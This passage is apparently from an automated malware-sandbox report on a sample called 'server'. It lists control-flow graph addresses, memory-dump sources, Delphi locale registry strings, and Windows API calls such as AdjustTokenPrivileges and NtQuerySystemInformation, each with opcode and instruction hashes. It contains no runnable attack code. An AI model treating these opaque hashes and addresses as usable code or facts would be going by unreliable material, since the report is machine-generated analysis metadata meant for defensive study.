7760 2fd6590-2fd65b4 7738->7760 7740->7741 7744 2fd6bac-2fd6c03 7741->7744 7745 2fd6c83-2fd6c97 7741->7745 7865 2fd6c0a-2fd6c3c 7744->7865 7761 2fd6ddd-2fd6df1 7745->7761 7762 2fd6c9d-2fd6d96 7745->7762 7755->7688 7824 2fd65fb-2fd6604 7760->7824 7825 2fd65b6-2fd65f0 7760->7825 7770 2fd7054-2fd7068 7761->7770 7771 2fd6df7-2fd6e47 7761->7771 7762->7761 7779 2fd706e-2fd7109 call 2fd4270 * 2 7770->7779 7780 2fd7150-2fd7157 7770->7780 7884 2fd6e49-2fd6e6f 7771->7884 7885 2fd6eb5-2fd6ee0 7771->7885 7779->7780 7810 2fd64dd 7794->7810 7811 2fd63fa-2fd6409 7794->7811 7810->7677 7818 2fd64df 7811->7818 7819 2fd640f-2fd646f 7811->7819 7850 2fd64e4-2fd652c 7818->7850 7936 2fd6479-2fd64ad 7819->7936 7824->7755 7829 2fd6606 7824->7829 7825->7824 7829->7718 7850->7677 7865->7745 7882->7630 7949 2fd6e71-2fd6e91 7884->7949 7950 2fd6eb0 7884->7950 7953 2fd6fbe-2fd704f 7885->7953 7954 2fd6ee6-2fd6fb9 7885->7954 7894->7634 7904->7636 7914->7641 7924->7646 7926->7626 7934->7654 7936->7850 7955 2fd64af 7936->7955 7949->7950 7950->7770 7951->7664 7953->7770 7954->7770 7955->7794 7961 2fd5365 7956->7961 7957->7961 7961->7622 7962->7672 8006->7638 8007->7638
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 223ea39f47f570d02fe6b578e077f82ccc1157d8e2819af2fb134e62ee1d2df9
              • Instruction ID: 5ce3ac11f5627d3bb402da2a5700014e63b645c542c4ede419610f1eb4d73093
              • Opcode Fuzzy Hash: 223ea39f47f570d02fe6b578e077f82ccc1157d8e2819af2fb134e62ee1d2df9
              • Instruction Fuzzy Hash: 69D21575A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 8008 2fd5367-2fd53c0 8015 2fd5496-2fd54aa 8008->8015 8016 2fd53c6-2fd53d6 8008->8016 8017 2fd5667-2fd567b 8015->8017 8018 2fd54b0-2fd55df 8015->8018 8376 2fd53dc call 3970606 8016->8376 8377 2fd53dc call 39705df 8016->8377 8020 2fd57de-2fd57f2 8017->8020 8021 2fd5681-2fd578c 8017->8021 8301 2fd55ea-2fd5620 8018->8301 8023 2fd57f8-2fd5903 8020->8023 8024 2fd5955-2fd5969 8020->8024 8259 2fd5797 8021->8259 8270 2fd590e 8023->8270 8025 2fd5acc-2fd5ae0 8024->8025 8026 2fd596f-2fd5a7a 8024->8026 8029 2fd5ae6-2fd5bf1 8025->8029 8030 2fd5c43-2fd5c57 8025->8030 8280 2fd5a85 8026->8280 8027 2fd53e2-2fd5448 8093 2fd544f 8027->8093 8289 2fd5bfc 8029->8289 8033 2fd5c5d-2fd5d68 8030->8033 8034 2fd5dba-2fd5dce 8030->8034 8299 2fd5d73 8033->8299 8040 2fd5dd4-2fd5edf 8034->8040 8041 2fd5f31-2fd5f45 8034->8041 8308 2fd5eea 8040->8308 8046 2fd60a8-2fd60bc 8041->8046 8047 2fd5f4b-2fd6061 8041->8047 8050 2fd621f-2fd6233 8046->8050 8051 2fd60c2-2fd61cd 8046->8051 8047->8046 8057 2fd6239-2fd6344 8050->8057 8058 2fd6396-2fd63aa 8050->8058 8324 2fd61d8 8051->8324 8332 2fd634f 8057->8332 8064 2fd652e-2fd6542 8058->8064 8065 2fd63b0-2fd63f5 call 2fd4270 8058->8065 8072 2fd6548-2fd6567 8064->8072 8073 2fd6685-2fd6699 8064->8073 8174 2fd64b5-2fd64d7 8065->8174 8101 2fd660c-2fd662e 8072->8101 8082 2fd669f-2fd679f 8073->8082 8083 2fd67e6-2fd67fa 8073->8083 8082->8083 8089 2fd6947-2fd695b 8083->8089 8090 2fd6800-2fd6900 8083->8090 8096 2fd6aa8-2fd6ad2 8089->8096 8097 2fd6961-2fd6a61 8089->8097 8090->8089 8093->8015 8122 2fd6ad8-2fd6b4b 8096->8122 8123 2fd6b92-2fd6ba6 8096->8123 8097->8096 8106 2fd656c-2fd657b 8101->8106 8107 2fd6634 8101->8107 8119 2fd6636 8106->8119 8120 2fd6581-2fd6585 8106->8120 8107->8073 8137 2fd663b-2fd6683 8119->8137 8141 2fd6590-2fd65b4 8120->8141 8122->8123 8126 2fd6bac-2fd6c03 8123->8126 8127 2fd6c83-2fd6c97 8123->8127 8242 2fd6c0a-2fd6c3c 8126->8242 8142 2fd6ddd-2fd6df1 8127->8142 8143 2fd6c9d-2fd6d96 8127->8143 8137->8073 8203 2fd65fb-2fd6604 8141->8203 8204 2fd65b6-2fd65f0 8141->8204 8151 2fd7054-2fd7068 8142->8151 8152 2fd6df7-2fd6e47 8142->8152 8143->8142 8160 2fd706e-2fd7109 call 2fd4270 * 2 8151->8160 8161 2fd7150-2fd7157 8151->8161 8260 2fd6e49-2fd6e6f 8152->8260 8261 2fd6eb5-2fd6ee0 8152->8261 8160->8161 8189 2fd64dd 8174->8189 8190 2fd63fa-2fd6409 8174->8190 8189->8064 8197 2fd64df 8190->8197 8198 2fd640f-2fd646f 8190->8198 8228 2fd64e4-2fd652c 8197->8228 8310 2fd6479-2fd64ad 8198->8310 8203->8137 8208 2fd6606 8203->8208 8204->8203 8208->8101 8228->8064 8242->8127 8259->8020 8322 2fd6e71-2fd6e91 8260->8322 8323 2fd6eb0 8260->8323 8326 2fd6fbe-2fd704f 8261->8326 8327 2fd6ee6-2fd6fb9 8261->8327 8270->8024 8280->8025 8289->8030 8299->8034 8301->8017 8308->8041 8310->8228 8328 2fd64af 8310->8328 8322->8323 8323->8151 8324->8050 8326->8151 8327->8151 8328->8174 8332->8058 8376->8027 8377->8027
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 484add42cf001977f87d032512da402fea9ff6ae5a2bfbeb9e44eab7e66149ee
              • Instruction ID: 285ac6ca0a1eade920f1e44ca1ae04f5c66957057dd58e9ad85618986ea6921b
              • Opcode Fuzzy Hash: 484add42cf001977f87d032512da402fea9ff6ae5a2bfbeb9e44eab7e66149ee
              • Instruction Fuzzy Hash: D2C20474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0CF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 8378 2fd5451-2fd54aa 8385 2fd5667-2fd567b 8378->8385 8386 2fd54b0-2fd55df 8378->8386 8387 2fd57de-2fd57f2 8385->8387 8388 2fd5681-2fd578c 8385->8388 8662 2fd55ea-2fd5620 8386->8662 8390 2fd57f8-2fd5903 8387->8390 8391 2fd5955-2fd5969 8387->8391 8620 2fd5797 8388->8620 8631 2fd590e 8390->8631 8392 2fd5acc-2fd5ae0 8391->8392 8393 2fd596f-2fd5a7a 8391->8393 8395 2fd5ae6-2fd5bf1 8392->8395 8396 2fd5c43-2fd5c57 8392->8396 8641 2fd5a85 8393->8641 8650 2fd5bfc 8395->8650 8399 2fd5c5d-2fd5d68 8396->8399 8400 2fd5dba-2fd5dce 8396->8400 8660 2fd5d73 8399->8660 8405 2fd5dd4-2fd5edf 8400->8405 8406 2fd5f31-2fd5f45 8400->8406 8669 2fd5eea 8405->8669 8411 2fd60a8-2fd60bc 8406->8411 8412 2fd5f4b-2fd6061 8406->8412 8414 2fd621f-2fd6233 8411->8414 8415 2fd60c2-2fd61cd 8411->8415 8412->8411 8421 2fd6239-2fd6344 8414->8421 8422 2fd6396-2fd63aa 8414->8422 8685 2fd61d8 8415->8685 8693 2fd634f 8421->8693 8427 2fd652e-2fd6542 8422->8427 8428 2fd63b0-2fd63f5 call 2fd4270 8422->8428 8436 2fd6548-2fd6567 8427->8436 8437 2fd6685-2fd6699 8427->8437 8535 2fd64b5-2fd64d7 8428->8535 8462 2fd660c-2fd662e 8436->8462 8444 2fd669f-2fd679f 8437->8444 8445 2fd67e6-2fd67fa 8437->8445 8444->8445 8451 2fd6947-2fd695b 8445->8451 8452 2fd6800-2fd6900 8445->8452 8457 2fd6aa8-2fd6ad2 8451->8457 8458 2fd6961-2fd6a61 8451->8458 8452->8451 8483 2fd6ad8-2fd6b4b 8457->8483 8484 2fd6b92-2fd6ba6 8457->8484 8458->8457 8467 2fd656c-2fd657b 8462->8467 8468 2fd6634 8462->8468 8480 2fd6636 8467->8480 8481 2fd6581-2fd6585 8467->8481 8468->8437 8498 2fd663b-2fd6683 8480->8498 8502 2fd6590-2fd65b4 8481->8502 8483->8484 8487 2fd6bac-2fd6c03 8484->8487 8488 2fd6c83-2fd6c97 8484->8488 8603 2fd6c0a-2fd6c3c 8487->8603 8503 2fd6ddd-2fd6df1 8488->8503 8504 2fd6c9d-2fd6d96 8488->8504 8498->8437 8564 2fd65fb-2fd6604 8502->8564 8565 2fd65b6-2fd65f0 8502->8565 8512 2fd7054-2fd7068 8503->8512 8513 2fd6df7-2fd6e47 8503->8513 8504->8503 8521 2fd706e-2fd7109 call 2fd4270 * 2 8512->8521 8522 2fd7150-2fd7157 8512->8522 8621 2fd6e49-2fd6e6f 8513->8621 8622 2fd6eb5-2fd6ee0 8513->8622 8521->8522 8550 2fd64dd 8535->8550 8551 2fd63fa-2fd6409 8535->8551 8550->8427 8558 2fd64df 8551->8558 8559 2fd640f-2fd646f 8551->8559 8589 2fd64e4-2fd652c 8558->8589 8671 2fd6479-2fd64ad 8559->8671 8564->8498 8569 2fd6606 8564->8569 8565->8564 8569->8462 8589->8427 8603->8488 8620->8387 8683 2fd6e71-2fd6e91 8621->8683 8684 2fd6eb0 8621->8684 8687 2fd6fbe-2fd704f 8622->8687 8688 2fd6ee6-2fd6fb9 8622->8688 8631->8391 8641->8392 8650->8396 8660->8400 8662->8385 8669->8406 8671->8589 8689 2fd64af 8671->8689 8683->8684 8684->8512 8685->8414 8687->8512 8688->8512 8689->8535 8693->8422
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl
              • API String ID: 0-798552604
              • Opcode ID: 5e114f83e818f4adb0564ac604891e4bcd40eaab81733bdf18fd2dddb6f36207
              • Instruction ID: 39ddc5ca24d487e2b0018b53dadc67840d34bf49d2c3ba5c4ddfa68ec4824d8c
              • Opcode Fuzzy Hash: 5e114f83e818f4adb0564ac604891e4bcd40eaab81733bdf18fd2dddb6f36207
              • Instruction Fuzzy Hash: 25C20574A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0CF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID:
              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
              • API String ID: 0-2375825460
              • Opcode ID: 97b234343d6e153c8eb52836f92f753bca942229ef1f297fb5add1052643b284
              • Instruction ID: eddc7a92c2415ef4aa09a8c5971df3d1c886c0a05183bb4efec88bbdab9b6a1f
              • Opcode Fuzzy Hash: 97b234343d6e153c8eb52836f92f753bca942229ef1f297fb5add1052643b284
              • Instruction Fuzzy Hash: 695157B5A4465C7AEB35D6A49C47FEF7BECDB04740F6001E1BA04E6181DB74AE44CBA0
              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D9BCCF
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: be6a110abac89824d81106b4f7bb7969c0a6d04aef3d242399bc5405c73eda81
              • Instruction ID: b9e17e9ed9f8571db8e0dd31a18056c935473f59dfe0756e91300890434bf20d
              • Opcode Fuzzy Hash: be6a110abac89824d81106b4f7bb7969c0a6d04aef3d242399bc5405c73eda81
              • Instruction Fuzzy Hash: C621D175509380AFEB128F25DC44B52BFB4EF06320F0D84DAE9858F163D3719908DB61
              APIs
              • NtQuerySystemInformation.NTDLL ref: 00D9BF01
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: 51842297e1539f65884f2ed6bf20275602198e213e6343f1f637f42eb134f9b4
              • Instruction ID: 53ffd8bbac1e3ad8c5a93283aa28af4020b82d6d2b7ed39b57a10ed87175f09f
              • Opcode Fuzzy Hash: 51842297e1539f65884f2ed6bf20275602198e213e6343f1f637f42eb134f9b4
              • Instruction Fuzzy Hash: CF21AE754097C0AFDB238F20DC45A52FFB4EF16324F0D84CBE9848B5A3D265A909DB62
              APIs
              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19A8C
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 72f16cc73f8e05ff297cc1c02629eb88483d54904c94eb1b2eb0384d0f4aded7
              • Instruction ID: b0ee83016ee64d0162bdd21f3533a5349e73fc3576650aa683c08825f2820151
              • Opcode Fuzzy Hash: 72f16cc73f8e05ff297cc1c02629eb88483d54904c94eb1b2eb0384d0f4aded7
              • Instruction Fuzzy Hash: 62014AB6200259BFDB10DE8ADCC4DEBBBACFB8D694B444105BB1897202C230AD51CB70
              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D9BCCF
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: 5ab2ec61cd5de0dfc41f049f0c50115935dd23f333acad5dd31ecd8dde4c1e0e
              • Instruction ID: d0b4a42ca3a67f38c6f5b9bbf46d41868e3edc435b115713e3a5a04841a2e1f1
              • Opcode Fuzzy Hash: 5ab2ec61cd5de0dfc41f049f0c50115935dd23f333acad5dd31ecd8dde4c1e0e
              • Instruction Fuzzy Hash: D11191355002009FDF21CF55D984B66FBE4EF04320F08C86ADD4A8B621D731E418DB71
              APIs
              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A19A24
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: e1194cba89d96a9adaad6b31ab54561abdd7c4b2885d6cb8ed652d7c14b3e6b9
              • Instruction ID: ef50d61213d687e778140d2dd7e3fe86d70cd90fb7b4ed3d33d25a55938b21e6
              • Opcode Fuzzy Hash: e1194cba89d96a9adaad6b31ab54561abdd7c4b2885d6cb8ed652d7c14b3e6b9
              • Instruction Fuzzy Hash: 9EF091B6100249BF9710DE86DCC4DE77B6CEB8D7A1B444105F71897101C230AD51C770
              APIs
              • NtQuerySystemInformation.NTDLL ref: 00D9BF01
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: 70ba3cb29305a728eeb31aa2a5e8c5840b2c380f6ee8ca77a007dbabda48eb74
              • Instruction ID: 6c6411aafcd694a711a99ed63a97b3bd4ce02241ef80425cbeaacbcc94fae268
              • Opcode Fuzzy Hash: 70ba3cb29305a728eeb31aa2a5e8c5840b2c380f6ee8ca77a007dbabda48eb74
              • Instruction Fuzzy Hash: C1018F364006409FDF218F15ED85B61FBA0EF04724F08C49AED894B662D376E418DF72
              APIs
              • NtSetInformationFile.NTDLL(?,?,?,?,?), ref: 00A1999B
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileInformation
              • String ID:
              • API String ID: 4253254148-0
              • Opcode ID: aed5271f86a1d247009eeca274fa38cc96bac1d708ae4ce7e621e3d944de5634
              • Instruction ID: 20c930b24f325d56f597a679064fbeaa3e3f385a1786a3f5cefe3ecaa26c3440
              • Opcode Fuzzy Hash: aed5271f86a1d247009eeca274fa38cc96bac1d708ae4ce7e621e3d944de5634
              • Instruction Fuzzy Hash: 38E0ECA1604258BEE73497DAAC0DDF77F6DDBC6BF1B04411DB60892110C261AC81C2B4
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
